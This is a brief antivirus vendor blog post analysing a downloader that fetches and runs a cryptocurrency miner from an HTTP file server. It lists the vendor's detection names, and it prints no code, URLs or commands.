Recently, X-Sec Labs caught a downloader which can download CoinMiner from a Http File Server(HFS).
First, let’s load it into Exeinfo PE.
But we can open it with NotePad 😉
From these three images, we can guess the core function will download a file from specific URL, then run it with extra arguments. The extra arguments are usually used by CoinMiner to set specific mining pool & related account.
Now, we can manually download related file.
X-Sec Antivirus Detection:
Cloud Engine: Cloud:Trojan.Win32.CoinMiner(For downloader and downloaded file)
Local Engine: Trojan.Win32.CoinMiner.Ah(Only for downloader)
Required Virus Definition Version: 2017.12.07.01(Not released when this blog posted)